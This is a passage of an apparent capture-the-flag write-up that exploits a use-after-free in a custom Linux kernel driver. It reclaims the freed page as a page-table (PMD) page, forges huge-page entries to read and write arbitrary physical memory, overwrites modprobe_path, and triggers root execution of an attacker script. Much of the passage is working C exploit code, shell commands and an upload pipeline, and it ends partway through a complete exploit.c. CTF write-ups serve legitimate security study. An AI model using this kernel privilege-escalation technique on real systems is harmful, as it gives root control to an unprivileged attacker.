huge pages: Write 2MB huge page entries into the PMD, creating a window over arbitrary physical memory. Find modprobe_path: Scan physical memory for the /sbin/modprobe string. Overwrite: Replace it with /tmp/x, a script that copies the flag. Trigger: Execute a file with invalid magic bytes. The kernel runs our script as root. Phase 1: Obtaining the UAF # This is straightforward, as described above:\nint fd = open(\u0026#34;/dev/phantom\u0026#34;, O_RDWR); ioctl(fd, CMD_ALLOC, 0); volatile uint64_t *uaf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); ioctl(fd, CMD_FREE, 0); At this point, uaf points to a 4KB page that\u0026rsquo;s been returned to the kernel\u0026rsquo;s free list. The page was filled with 0x41 bytes by the driver\u0026rsquo;s alloc handler, so if nothing has reused it yet, we\u0026rsquo;d see 0x4141414141414141 at every qword.\nPhase 2: Reclaiming the page as a PMD # We need the kernel to allocate our freed page as a PMD page. The kernel\u0026rsquo;s page table allocator draws from the same buddy allocator free lists as alloc_pages(). When a process touches a virtual address that doesn\u0026rsquo;t have page table structures built out yet, the kernel\u0026rsquo;s page fault handler walks the existing tables, discovers the gap, and allocates new table pages to fill it.\nThe specific call chain for PMD allocation:\nhandle_page_fault() → handle_mm_fault() → __handle_mm_fault() → __pmd_alloc() // allocates if PMD page is missing → pmd_alloc_one() → alloc_page(GFP_PGTABLE_USER) // GFP_PGTABLE_USER ≈ GFP_KERNEL pmd_alloc_one() ultimately calls alloc_pages() with order 0—the exact same allocator and order as our freed page. The freed page sits in the buddy allocator\u0026rsquo;s order-0 free list, and these PMD page allocations pull from that same list.\nThe strategy: mmap 1024 small mappings spaced exactly 2MB apart in virtual address space, then write to each one. The mmap call with MAP_ANONYMOUS just reserves the virtual address range — Linux is lazy and doesn\u0026rsquo;t allocate physical memory or build page tables until you actually access the address. The write (*(volatile uint64_t *)p = ...) is what forces the kernel\u0026rsquo;s hand: it triggers a page fault, the kernel walks the page tables, discovers it needs to create new table pages to hold the mapping, and allocates them from the buddy allocator. That\u0026rsquo;s how we get the kernel to pull pages from the same free list where our UAF page is sitting.\n#define SPRAY_BASE 0x40000000UL // 1GB mark #define SPRAY_STRIDE 0x200000UL // 2MB for (int i = 0; i \u0026lt; 1024; i++) { void *addr = (void *)(SPRAY_BASE + (uint64_t)i * SPRAY_STRIDE); void *p = mmap(addr, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); if (p != MAP_FAILED) *(volatile uint64_t *)p = 0xCAFE0000ULL + i; // write triggers page fault } Why 2MB stride forces PMD allocations # Each PMD entry covers \\(2^{21} = \\text{2MB}\\) of virtual address space (bits 29:21 of the virtual address select the PMD entry). A single PMD page holds \\(2^9 = 512\\) entries (\\(512 \\times 8\\text{ bytes} = 4096\\text{ bytes} = \\text{one page}\\)), covering \\(512 \\times \\text{2MB} = \\text{1GB}\\) of virtual address space.\nMappings within the same 2MB region share the same PMD entry—they differ only in bits 20:0, which index into the PTE page pointed to by that PMD entry. But mappings in different 2MB regions need different PMD entries. If those PMD entries are in different PMD pages (because they span more than 1GB), the kernel must allocate multiple PMD pages.\nBy spacing 1024 mappings exactly 2MB apart, we span addresses 0x40000000 through 0xBFFFF000:\nMapping 0: 0x040000000 → PMD page A, entry 0 (0x40000000 \u0026gt;\u0026gt; 21 = 512, mod 512 = 0) Mapping 1: 0x040200000 → PMD page A, entry 1 ... Mapping 511: 0x07FE00000 → PMD page A, entry 511 Mapping 512: 0x080000000 → PMD page B, entry 0 (crosses 1GB boundary) ... Mapping 1023: 0x0BFE00000 → PMD page B, entry 511 Before our spray, this address range was unused. The PGD and PUD entries for it may or may not exist, but the PMD pages definitely don\u0026rsquo;t. When we touch each mapping, the kernel:\nTakes a page fault (the PTE is missing) Walks from CR3 → PGD → PUD → PMD → discovers the PMD entry is empty Allocates a new PTE page to hold the mapping If the PMD page itself doesn\u0026rsquo;t exist yet (first touch in this 1GB range), allocates a new PMD page too The PMD page allocations (at most 2 for 1024 mappings across 2GB) are what we want. But note: the spray also allocates 1024 PTE pages (one per mapping, since each mapping is in a different 2MB region) and 1024 data pages (the anonymous pages that back our written values). That\u0026rsquo;s \\(1024 + 1024 + 2 \\approx 2050\\) page allocations, creating plenty of demand from the buddy allocator.\nWith 256MB of RAM and a minimal busybox system, the free page pool contains on the order of \\(\\sim\\!50{,}000\\) free pages. Our freed page is one of them. The \\(\\sim\\!2050\\) allocations during the spray have a high probability of grabbing it, and we specifically want it grabbed as a PMD page (not as a data page or PTE page). Since the PMD page allocations happen early in the spray (as soon as the first mapping in each 1GB range is touched), and our recently-freed page is likely near the head of the free list (the buddy allocator uses LIFO within each free list), the probability is high.\nVerifying reclamation # After the spray, we check the UAF pointer to see what\u0026rsquo;s there:\nint count = 0; for (int i = 0; i \u0026lt; 512; i++) { uint64_t v = uaf[i]; if (v \u0026amp;\u0026amp; v != 0x4141414141414141ULL \u0026amp;\u0026amp; (v \u0026amp; PT_PRESENT) \u0026amp;\u0026amp; (v \u0026amp; PT_USER)) count++; } If the page was reclaimed as a PMD, its 512 qwords are no longer 0x4141414141414141. Instead, they\u0026rsquo;re PTE page physical addresses with flag bits set. Each PMD entry points to a PTE page, and the entries have at least Present (bit 0) and User (bit 2) set. A successful PMD reclaim shows a high count—ideally 512/512 since we touched a mapping in every 2MB slot.\nThere\u0026rsquo;s an ambiguity here: we can\u0026rsquo;t easily tell from the entry values alone whether our page was reclaimed as a PMD page (entries point to PTE pages) or a PTE page (entries point to data pages). Both types of entries have Present and User set, and both contain physical addresses in the upper bits. The verification step doesn\u0026rsquo;t try to distinguish — it just confirms the page contains page table entries of some kind, not 0x41 fill data. Phase 3 resolves the ambiguity by probing from userspace: we write a huge page entry and observe whether it actually changes address translation, which only works if we control a PMD page.\nIf the count is low (say \\(\u0026lt; 64\\)), the page wasn\u0026rsquo;t reclaimed as a page table at all — maybe it became an anonymous data page or page cache page. In that case, we\u0026rsquo;d need to retry the entire exploit.\nPhase 3: Identifying the PMD\u0026rsquo;s virtual address range # We know our UAF page is a PMD page, but we don\u0026rsquo;t know which one. Our spray covers two 1GB ranges, so the page is either the PMD for 0x40000000–0x7FFFFFFF or for 0x80000000–0xBFFFFFFF. We need to know the exact base address so we can calculate the relationship: PMD entry i controls the 2MB virtual range starting at virt_base + i * 0x200000.\nThe trick: temporarily corrupt a PMD entry and observe the effect from userspace. We replace PMD entry 0 with a 2MB huge page entry mapping physical address 0:\nuint64_t saved = uaf[0]; uaf[0] = 0xE7; // phys_addr=0 | P|RW|US|A|D|PS getpid(); // flush TLB (CR3 reload via syscall) The value 0xE7 as a PMD entry means:\nbits 51:21 = 0x0 → physical base address 0 (first 2MB of RAM) bit 7 = 1 (PS) → this is a 2MB huge page, skip PTE level bit 6 = 1 (D) → dirty bit 5 = 1 (A) → accessed bit 2 = 1 (U/S) → userspace-accessible bit 1 = 1 (R/W) → writable bit 0 = 1 (P) → present After the TLB flush, whichever 2MB virtual range was governed by PMD entry 0 no longer maps to a PTE page and its associated data pages. Instead, it maps directly to physical addresses 0x000000–0x1FFFFF (the first 2MB of physical RAM — BIOS data, real-mode IVT, etc.).\nNow we test: read from SPRAY_BASE (the first address in our spray). During Phase 2, we wrote 0xCAFE0000 there, and under normal translation (PMD → PTE → data page) we\u0026rsquo;d read that value back. But if SPRAY_BASE falls in the 2MB range we just redirected to physical address 0, the read goes to physical RAM instead and returns whatever is there (certainly not 0xCAFE0000). A mismatch tells us this address range is governed by our PMD:\nvolatile uint64_t probe = *(volatile uint64_t *)SPRAY_BASE; uaf[0] = saved; // restore original PMD entry (points back to PTE page) getpid(); // flush again to restore normal translation if (probe != 0xCAFE0000ULL) { // SPRAY_BASE is governed by our PMD entry 0 virt_base = SPRAY_BASE; } If SPRAY_BASE still reads 0xCAFE0000, then it\u0026rsquo;s governed by the other PMD page (the one we don\u0026rsquo;t control). We try the second candidate:\n// Try the second 1GB range saved = uaf[0]; uaf[0] = 0xE7; getpid(); probe = *(volatile uint64_t *)(SPRAY_BASE + 512 * 0x200000); uaf[0] = saved; getpid(); if (probe != (0xCAFE0000ULL + 512)) virt_base = SPRAY_BASE + 512 * 0x200000; One of the two candidates will hit. This probe is safe because we immediately restore the original PMD entry: the corruption is transient, lasting only for the single read. Even if a signal or interrupt occurs during the window, the worst case is reading from low physical memory (the BIOS/real-mode area), which is mapped and readable.\nOnce identified, the relationship is fixed and deterministic: virtual address virt_base + i * 0x200000 is translated through uaf[i]. Modifying uaf[i] changes where that virtual address points in physical memory. This is the core primitive that drives the rest of the exploit.\nPhase 4: Arbitrary physical memory access # This is where the exploit becomes powerful. Assuming reclamation succeeded (Phase 2 verified this, Phase 3 confirmed it\u0026rsquo;s a PMD), we have a full PMD page: 512 entries, each controlling \\(\\text{2MB}\\) of virtual-to-physical translation. Our spray populated all 512 slots (one mapping per 2MB region), so every entry contains a valid PTE page pointer. We can overwrite any of them. By writing physical_address | 0xE7 into an entry, we replace the normal PMD → PTE → data page translation with a direct 2MB huge page mapping to arbitrary physical memory. After a TLB flush, reads and writes through the corresponding virtual address go directly to the chosen physical RAM.\nThe reclamation is probabilistic — there\u0026rsquo;s no guarantee the freed page becomes a PMD page rather than a data page or PTE page. But with only 256MB of RAM and LIFO free list behavior, the probability is high. The exploit exits early and asks for a retry if reclamation fails; in practice it succeeds on the first attempt most of the time.\nThe flags we use (0xE7) create a maximally permissive entry:\n#define PMD_HUGE 0xE7ULL // Bit 0 (P): Present // Bit 1 (R/W): Read-write // Bit 2 (U/S): User-accessible (critical: without this, userspace reads would fault) // Bit 5 (A): Accessed (pre-set to avoid hardware setting it later) // Bit 6 (D): Dirty (pre-set to avoid write-protection faults) // Bit 7 (PS): Page Size = 1 → 2MB huge page (skip PTE level) Pre-setting the Accessed and Dirty bits avoids hardware interference. When the CPU accesses a page whose A bit is clear, it performs a read-modify-write on the page table entry to set it. Same for the D bit on the first write. These are atomic hardware operations on the PMD entry — but we\u0026rsquo;re modifying entries through a UAF mapping, so a concurrent hardware write could race with our changes. Pre-setting both bits means the CPU sees them already set and leaves the entry alone.\nThe naive approach and why it failed # The obvious approach: iterate through physical memory in 2MB chunks, each time setting uaf[0] to a new physical address, flushing the TLB, and reading through virt_base:\n// This doesn\u0026#39;t work reliably! for (int chunk = 0; chunk \u0026lt; 128; chunk++) { uaf[0] = (chunk * 0x200000UL) | 0xE7; getpid(); // TLB flush // read through virt_base... } This should work in theory—writing CR3 flushes the entire TLB on CPUs without PCID (Process Context IDentifiers), and our QEMU qemu64 CPU doesn\u0026rsquo;t support PCID. But in practice, QEMU\u0026rsquo;s software MMU emulation has a subtlety: repeatedly overwriting the same PMD slot with different huge page entries and flushing between each doesn\u0026rsquo;t always produce fully fresh translations. The QEMU softmmu TLB is a software structure that gets invalidated on CR3 writes, but the invalidation granularity or timing doesn\u0026rsquo;t perfectly match real hardware behavior. We observed stale reads where the data from a previous chunk appeared at addresses that should reflect the new mapping.\nOn real hardware with real TLBs, this sequential approach would work. But we\u0026rsquo;re in QEMU, so we need a workaround.\nThe parallel PMD approach # The solution is elegant: avoid reusing the same PMD entry index entirely. Instead of modifying entry 0 for each chunk, we set up all 128 entries simultaneously, each pointing to a different 2MB physical chunk:\n// 256MB RAM = 128 chunks of 2MB uint64_t saved_pmds[MAX_CHUNKS]; for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS; chunk++) { saved_pmds[chunk] = uaf[chunk]; // save original PTE-page pointer uaf[chunk] = ((uint64_t)chunk * 0x200000UL) | PMD_HUGE; // huge page → phys chunk } getpid(); // single TLB flush After this single setup and one TLB flush, the first 128 entries of our PMD page create a linear map of all physical memory:\nPMD entry Virtual address Maps to physical uaf[0] virt_base + 0 * 2MB 0x000000 – 0x1FFFFF uaf[1] virt_base + 1 * 2MB 0x200000 – 0x3FFFFF uaf[2] virt_base + 2 * 2MB 0x400000 – 0x5FFFFF \u0026hellip; \u0026hellip; \u0026hellip; uaf[127] virt_base + 127 * 2MB 0xFE00000 – 0xFFFFFFF All \\(\\text{256MB}\\) of physical RAM is now simultaneously accessible as a contiguous \\(\\text{256MB}\\) virtual region. Each PMD entry is used only once, so every translation is fresh—no TLB staleness. We can scan the entire physical address space in a single pass without any additional TLB flushes.\nThis is conceptually similar to the kernel\u0026rsquo;s own direct map (page_offset_base), except we\u0026rsquo;ve constructed it from userspace by forging page table entries. The kernel\u0026rsquo;s SMEP/SMAP protections are irrelevant here: those prevent the kernel from accessing userspace pages, not the other way around. We\u0026rsquo;re in userspace, accessing physical memory through valid (forged) page table entries. The MMU hardware enforces the page table, and our entries say \u0026ldquo;user-accessible, read-write.\u0026rdquo;\nPhase 5: Finding modprobe_path # We have arbitrary physical memory read/write. Now we need a target — something in kernel memory we can overwrite to escalate privileges.\nmodprobe is a userspace utility that loads kernel modules (.ko files). When the kernel needs a module it doesn\u0026rsquo;t have — for example, a filesystem driver or a network protocol — it doesn\u0026rsquo;t load the module directly. Instead, it spawns a userspace process that runs the modprobe binary, which resolves dependencies and loads the module via insmod. The kernel stores the path to this utility in a global variable called modprobe_path, defaulting to \u0026quot;/sbin/modprobe\u0026quot;.\nThe reason we care: modprobe_path is a writable string in kernel memory, and the kernel executes whatever path it contains as root. If we can overwrite it to point at a script we control, the kernel will run our script with full root privileges. We just need a way to trigger the kernel into calling modprobe — which turns out to be easy (Phase 6 covers this). First, we need to find the string in physical memory.\nThe variable is defined as:\n// kernel/module/kmod.c char modprobe_path[KMOD_PATH_LEN] = CONFIG_MODPROBE_PATH; // KMOD_PATH_LEN = 256, CONFIG_MODPROBE_PATH = \u0026#34;/sbin/modprobe\u0026#34; It\u0026rsquo;s a 256-byte char array in the kernel\u0026rsquo;s .data section (writable data, not .rodata). The default value is \u0026quot;/sbin/modprobe\u0026quot; (15 bytes including the null terminator), followed by \\(256 - 15 = 241\\) bytes of zeros. We need to find its physical address so we can overwrite it.\nWhy the offset within 2MB is fixed # KASLR randomizes the kernel\u0026rsquo;s base address, both virtual (_text) and physical (where in RAM the kernel image is loaded). However, the physical placement is always aligned to at least 2MB (CONFIG_PHYSICAL_ALIGN), and typically to a larger power of two. This means the kernel\u0026rsquo;s physical base address is always \\(N \\times \\texttt{0x200000}\\) for some integer \\(N\\).\nSince modprobe_path is at a fixed offset from the kernel\u0026rsquo;s base, and the base is 2MB-aligned, modprobe_path\u0026rsquo;s offset within its 2MB physical chunk is constant regardless of KASLR. Given the symbol\u0026rsquo;s virtual address offset from _text:\n0x1b3f5c0 % 0x200000 = 0x1b3f5c0 \u0026amp; 0x1FFFFF = 0x13f5c0 To extract this offset, we decompress vmlinux from the bzImage (using extract-vmlinux or similar) and look up the symbol in the symbol table. The exact offset depends on the kernel build, but for this challenge\u0026rsquo;s kernel 6.6.15, it\u0026rsquo;s 0x13f5c0.\nThe fast scan # With all 128 PMD entries already set up as huge pages (from Phase 4), we have a 256MB window into physical RAM. We just check offset 0x13f5c0 in each 2MB chunk — only \\(128\\) memory reads to search the entire physical address space:\n#define KNOWN_OFF 0x13f5c0 for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS \u0026amp;\u0026amp; !found; chunk++) { volatile char *w = (volatile char *)(virt_base + (uint64_t)chunk * PAGE_2M); // Quick pre-filter: check key characters before full comparison if (w[KNOWN_OFF] == \u0026#39;/\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+1] == \u0026#39;s\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+5] == \u0026#39;/\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+6] == \u0026#39;m\u0026#39;) { // Full 14-byte comparison: \u0026#34;/sbin/modprobe\u0026#34; const char *ref = \u0026#34;/sbin/modprobe\u0026#34;; int ok = 1; for (int j = 0; j \u0026lt; 14 \u0026amp;\u0026amp; ok; j++) if (w[KNOWN_OFF + j] != ref[j]) ok = 0; if (ok) { mod_phys = (uint64_t)chunk * PAGE_2M + KNOWN_OFF; found = 1; } } } The pre-filter checks 4 strategic characters first (/, s, /, m) to avoid the full 14-byte comparison on every chunk. In practice, only one chunk contains /sbin/modprobe at this exact offset, so the pre-filter immediately rejects \\(127\\) of \\(128\\) chunks.\nThe exploit also includes a slow-scan fallback that does a byte-by-byte search through each 2MB chunk, in case the KNOWN_OFF calculation is wrong. Note that the fallback uses the sequential single-slot approach (rewriting uaf[scan_idx] in a loop) that we identified as unreliable in QEMU — so it may suffer from the same TLB staleness issues. It\u0026rsquo;s a last resort; in practice, the fast scan always succeeds.\nAfter the scan, we restore all 128 PMD entries and flush:\nfor (int chunk = 0; chunk \u0026lt; MAX_CHUNKS; chunk++) uaf[chunk] = saved_pmds[chunk]; getpid(); The process\u0026rsquo;s page tables are back to normal. Our spray mappings work as before—the original PMD entries (which pointed to PTE pages holding our 0xCAFE0000 + i data pages) are restored.\nPhase 6: Overwriting modprobe_path # How modprobe_path gets executed # When a process calls execve() on a file, the kernel inspects the file\u0026rsquo;s first few bytes (the \u0026ldquo;magic number\u0026rdquo;) to determine its format. ELF binaries start with \\x7fELF, shell scripts start with #!, and so on. The kernel iterates through its registered binary handlers (search_binary_handler):\n// fs/exec.c (simplified) static int search_binary_handler(struct linux_binprm *bprm) { list_for_each_entry(fmt, \u0026amp;formats, lh) { retval = fmt-\u0026gt;load_binary(bprm); if (retval != -ENOEXEC) return retval; // handler claimed it } // No handler matched → try to load a binfmt module request_module(\u0026#34;binfmt-%04x\u0026#34;, *(unsigned short *)(bprm-\u0026gt;buf + 2)); // ... retry handlers ... } If no handler recognizes the format, request_module() tries to load a kernel module that might handle it. This calls __request_module() → call_modprobe():\n// kernel/module/kmod.c (simplified) static int call_modprobe(char *module_name, int wait) { char *argv[] = { modprobe_path, \u0026#34;-q\u0026#34;, \u0026#34;--\u0026#34;, module_name, NULL }; struct subprocess_info *info; info = call_usermodehelper_setup(modprobe_path, argv, ...); return call_usermodehelper_exec(info, wait); } call_usermodehelper_exec() spawns a new kernel thread that transitions to userspace and execve()s the path at modprobe_path. This execution happens with full root privileges (uid 0, gid 0, all capabilities). It\u0026rsquo;s a kernel-internal mechanism that predates any namespace or security module filtering in most configurations.\nThe full call chain:\nexecve(\u0026#34;/tmp/dummy\u0026#34;) ← userspace (uid 1000) → do_execve() → do_execveat_common() → bprm_execve() → exec_binprm() → search_binary_handler() → [no handler matches 0xffffffff magic] → request_module(\u0026#34;binfmt-ffff\u0026#34;) → call_modprobe(\u0026#34;binfmt-ffff\u0026#34;) → call_usermodehelper_setup(modprobe_path, ...) → call_usermodehelper_exec(...) ← kernel thread → execve(modprobe_path) as root ← root context! If we overwrite modprobe_path from \u0026quot;/sbin/modprobe\u0026quot; to \u0026quot;/tmp/x\u0026quot;, the kernel will execute /tmp/x as root. We control /tmp/x.\nThe overwrite # First, prepare a payload script that copies the flag:\nsystem(\u0026#34;echo \u0026#39;#!/bin/sh\\ncp /flag /tmp/flag\\nchmod 777 /tmp/flag\u0026#39;\u0026#34; \u0026#34; \u0026gt; /tmp/x \u0026amp;\u0026amp; chmod +x /tmp/x\u0026#34;); This creates /tmp/x containing:\n#!/bin/sh cp /flag /tmp/flag chmod 777 /tmp/flag Then we set up a single PMD entry to map the 2MB chunk containing modprobe_path and write over the string:\n// Calculate which 2MB chunk contains modprobe_path uint64_t mod_chunk = (mod_phys / PAGE_2M) * PAGE_2M; // 2MB-aligned base int mod_off = mod_phys - mod_chunk; // offset within chunk // Map the chunk via PMD entry 0 uaf[0] = mod_chunk | PMD_HUGE; getpid(); // TLB flush // Overwrite the string in physical memory volatile char *p = (volatile char *)virt_base + mod_off; p[0]=\u0026#39;/\u0026#39;; p[1]=\u0026#39;t\u0026#39;; p[2]=\u0026#39;m\u0026#39;; p[3]=\u0026#39;p\u0026#39;; p[4]=\u0026#39;/\u0026#39;; p[5]=\u0026#39;x\u0026#39;; p[6]=\u0026#39;\\0\u0026#39;; // Restore and flush uaf[0] = saved_pmd; getpid(); We write byte-by-byte rather than using memcpy to avoid any potential issues with word-tearing or compiler optimization on a volatile pointer. The original string \u0026quot;/sbin/modprobe\\0\u0026quot; is 15 bytes; we overwrite the first 7 bytes with \u0026quot;/tmp/x\\0\u0026quot;. The null terminator at byte 6 ends the C string — the remaining bytes (odprobe\\0...) are past the \\(\\texttt{\u0026rsquo;\\textbackslash 0\u0026rsquo;}\\) and never read.\nWe\u0026rsquo;re writing directly to the kernel\u0026rsquo;s .data section through physical memory, bypassing all kernel protections:\nSMEP/SMAP: Only prevent the kernel from executing/accessing userspace pages. They don\u0026rsquo;t prevent userspace from accessing kernel memory. KASLR: Randomizes virtual addresses, but we\u0026rsquo;re working with physical addresses discovered by scanning. Read-only mappings: The kernel\u0026rsquo;s virtual mapping of .data is read-write (it\u0026rsquo;s not .rodata), but even if it weren\u0026rsquo;t, we\u0026rsquo;re accessing the physical memory directly through our forged PTE. The kernel\u0026rsquo;s page table permissions for its own mapping of this page are irrelevant—we have our own mapping with different permissions. W^X / CONFIG_STRICT_KERNEL_RWX: This makes kernel .text non-writable via the kernel\u0026rsquo;s own page tables. But again, our forged PMD bypasses the kernel\u0026rsquo;s page tables entirely. We\u0026rsquo;re creating an independent, parallel mapping to the same physical memory. Phase 7: Trigger and flag # Execute a file with an unrecognized magic number. Four 0xFF bytes don\u0026rsquo;t match any known binary format handler:\nsystem(\u0026#34;echo -ne \u0026#39;\\\\xff\\\\xff\\\\xff\\\\xff\u0026#39; \u0026gt; /tmp/dummy\u0026#34; \u0026#34; \u0026amp;\u0026amp; chmod +x /tmp/dummy\u0026#34; \u0026#34; \u0026amp;\u0026amp; /tmp/dummy 2\u0026gt;/dev/null; true\u0026#34;); usleep(100000); // wait for usermode helper to run system(\u0026#34;cat /tmp/flag 2\u0026gt;/dev/null || echo \u0026#39;[-] no flag\u0026#39;\u0026#34;); The magic bytes 0xFFFFFFFF are chosen deliberately:\nNot \\x7fELF (ELF) Not #! (script) Not \\x00asm (wasm, if configured) Not any other registered binfmt magic The ; true after /tmp/dummy ensures the system() call returns success even though execve fails. The 2\u0026gt;/dev/null suppresses the \u0026ldquo;exec format error\u0026rdquo; message. The usleep(100000) (100ms) gives the kernel\u0026rsquo;s usermode helper thread time to spawn and execute /tmp/x asynchronously.\nThe kernel\u0026rsquo;s sequence: execve(\u0026quot;/tmp/dummy\u0026quot;) fails to find a handler, triggers request_module(\u0026quot;binfmt-ffff\u0026quot;), which runs modprobe_path (now \u0026quot;/tmp/x\u0026quot;) as root. Our script copies /flag to /tmp/flag with mode 777. We read it from our unprivileged context.\nRemote deployment # The remote gives a busybox shell inside the QEMU VM over netcat. There\u0026rsquo;s no scp, wget, curl, or any file transfer tool. The only way to get a binary onto the VM is to echo base64-encoded chunks through the shell.\nThe binary size problem # A statically linked glibc binary is 721KB. The size breakdown:\n721KB total (gcc -static) ~450KB glibc internal code (locale, nsswitch, pthread, math) ~200KB libc startup, stdio, malloc, string ops ~70KB our actual exploit code After gzip compression and base64 encoding: \\(721\\text{KB} \\to 320\\text{KB} \\to 427\\text{KB}\\) base64 → 446 echo commands at 960 bytes each. Each command is sent over the network, processed by the shell, and appended to a file. With network latency and shell processing overhead, the upload takes 30-60 seconds. The remote VM has a session timeout, and our first attempts uploaded successfully but the connection was killed before the exploit could start running.\nmusl-gcc to the rescue # Switching to musl libc produces dramatically smaller static binaries. musl was designed for correctness and minimal binary size in static linking, without glibc\u0026rsquo;s enormous infrastructure (no NSS, no iconv tables, no locale machinery, no libpthread bloat):\nmusl-gcc -static -Os -s -o exploit exploit.c glibc musl Binary size 721 KB 39 KB Gzipped 320 KB 17 KB Base64 427 KB 23 KB Echo chunks 446 25 \\(18\\times\\) smaller. The upload completes in under 2 seconds, leaving the entire session timeout for the exploit.\nThe flags: -Os optimizes for size (shorter instruction sequences, less inlining). -s strips the symbol table and debug info. -static links musl statically (no dynamic linker needed in the VM). The combination produces a minimal self-contained binary.\nUpload pipeline # The solve script compresses, base64-encodes, chunks, and uploads:\ncompressed = gzip.compress(data, compresslevel=9) b64 = base64.b64encode(compressed).decode() # Upload in 960-byte chunks via echo -n append r.sendline(b\u0026#34;cat /dev/null \u0026gt; /tmp/b64\u0026#34;) # initialize file for chunk in chunks: r.sendline(f\u0026#34;echo -n \u0026#39;{chunk}\u0026#39;\u0026gt;\u0026gt;/tmp/b64\u0026#34;.encode()) # Decode: base64 → gzip → binary r.sendline(b\u0026#34;base64 -d /tmp/b64 \u0026gt; /tmp/e.gz \u0026amp;\u0026amp; gzip -d /tmp/e.gz \u0026#34; b\u0026#34;\u0026amp;\u0026amp; mv /tmp/e /tmp/exploit \u0026amp;\u0026amp; chmod +x /tmp/exploit\u0026#34;) Two subtle gotchas discovered during development:\nBusybox\u0026rsquo;s gunzip requires .gz extension. Unlike GNU gzip, busybox\u0026rsquo;s implementation refuses to decompress files that don\u0026rsquo;t end in .gz. Piping (base64 -d | gzip -d \u0026gt; file) works as a workaround, but saving as .gz and then decompressing was more reliable across different busybox builds.\nChunk size matters. Chunks larger than ~1000 bytes can hit shell line-length limits or cause echo to misbehave on some busybox configurations. 960 bytes (divisible by 4 for clean base64) is a safe sweet spot.\nThe periodic echo SYNC / recvuntil(\u0026quot;SYNC\u0026quot;) synchronization in the solve script prevents the send buffer from overflowing: if we send all 25 chunks at full speed without waiting, some shells drop input.\nSolve scripts # exploit.c #define _GNU_SOURCE #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; #include \u0026lt;sys/ioctl.h\u0026gt; #include \u0026lt;sys/mman.h\u0026gt; #include \u0026lt;stdint.h\u0026gt; #define CMD_ALLOC 0x133701 #define CMD_FREE 0x133702 #define DEVICE \u0026#34;/dev/phantom\u0026#34; #define PAGE_SIZE 0x1000 #define PAGE_2M 0x200000UL #define SPRAY_COUNT 1024 #define SPRAY_BASE 0x40000000UL #define SPRAY_STRIDE PAGE_2M #define PMD_HUGE 0xE7ULL #define PT_PRESENT (1ULL \u0026lt;\u0026lt; 0) #define PT_USER (1ULL \u0026lt;\u0026lt; 2) #define MAX_CHUNKS 128 static void die(const char *m) { perror(m); exit(1); } static inline void tlb_flush(void) { getpid(); } int main(void) { int dev_fd; volatile uint64_t *uaf; setbuf(stdout, NULL); setbuf(stderr, NULL); printf(\u0026#34;[*] Phantom exploit\\n\u0026#34;); /* ---- UAF ---- */ dev_fd = open(DEVICE, O_RDWR); if (dev_fd \u0026lt; 0) die(\u0026#34;open\u0026#34;); if (ioctl(dev_fd, CMD_ALLOC, 0) \u0026lt; 0) die(\u0026#34;alloc\u0026#34;); uaf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, dev_fd, 0); if (uaf == MAP_FAILED) die(\u0026#34;mmap\u0026#34;); if (ioctl(dev_fd, CMD_FREE, 0) \u0026lt; 0) die(\u0026#34;free\u0026#34;); printf(\u0026#34;[+] UAF active\\n\u0026#34;); /* ---- PTE spray -\u0026gt; reclaim page as PMD page ---- */ for (int i = 0; i \u0026lt; SPRAY_COUNT; i++) { void *a = (void *)(SPRAY_BASE + (uint64_t)i * SPRAY_STRIDE); void *p = mmap(a, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); if (p != MAP_FAILED) *(volatile uint64_t *)p = 0xCAFE0000ULL + i; } int count = 0; for (int i = 0; i \u0026lt; 512; i++) { uint64_t v = uaf[i]; if (v \u0026amp;\u0026amp; v != 0x4141414141414141ULL \u0026amp;\u0026amp; (v \u0026amp; PT_PRESENT) \u0026amp;\u0026amp; (v \u0026amp; PT_USER)) count++; } printf(\u0026#34;[+] %d/512 page table entries\\n\u0026#34;, count); if (count \u0026lt; 64) { printf(\u0026#34;[-] Retry\\n\u0026#34;); return 1; } /* ---- Identify virtual base ---- */ uint64_t virt_base = 0; uint64_t saved = uaf[0]; uaf[0] = PMD_HUGE; tlb_flush(); volatile uint64_t probe = *(volatile uint64_t *)SPRAY_BASE; uaf[0] = saved; tlb_flush(); if (probe != 0xCAFE0000ULL) { virt_base = SPRAY_BASE; } else { saved = uaf[0]; uaf[0] = PMD_HUGE; tlb_flush(); probe = *(volatile uint64_t *)(SPRAY_BASE + 512 * SPRAY_STRIDE); uaf[0] = saved; tlb_flush(); if (probe != (0xCAFE0000ULL + 512)) virt_base = SPRAY_BASE + 512 * SPRAY_STRIDE; } if (!virt_base) { printf(\u0026#34;[-] PMD identification failed\\n\u0026#34;); return 1; } printf(\u0026#34;[+] PMD base: 0x%lx\\n\u0026#34;, virt_base); /* ---- Scan physical memory ---- */ volatile char *window = (volatile char *)virt_base; printf(\u0026#34;[*] Scanning physical memory...\\n\u0026#34;); uint64_t mod_phys = 0; int found = 0; /* Fast scan: parallel PMD entries */ #define KNOWN_OFF 0x13f5c0 uint64_t saved_pmds[MAX_CHUNKS]; for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS; chunk++) { saved_pmds[chunk] = uaf[chunk]; uaf[chunk] = ((uint64_t)chunk * PAGE_2M) | PMD_HUGE; } tlb_flush(); for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS \u0026amp;\u0026amp; !found; chunk++) { volatile char *w = (volatile char *)(virt_base + (uint64_t)chunk * PAGE_2M); if (w[KNOWN_OFF] == \u0026#39;/\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+1] == \u0026#39;s\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+5] == \u0026#39;/\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+6] == \u0026#39;m\u0026#39;) { const char *ref = \u0026#34;/sbin/modprobe\u0026#34;; int ok = 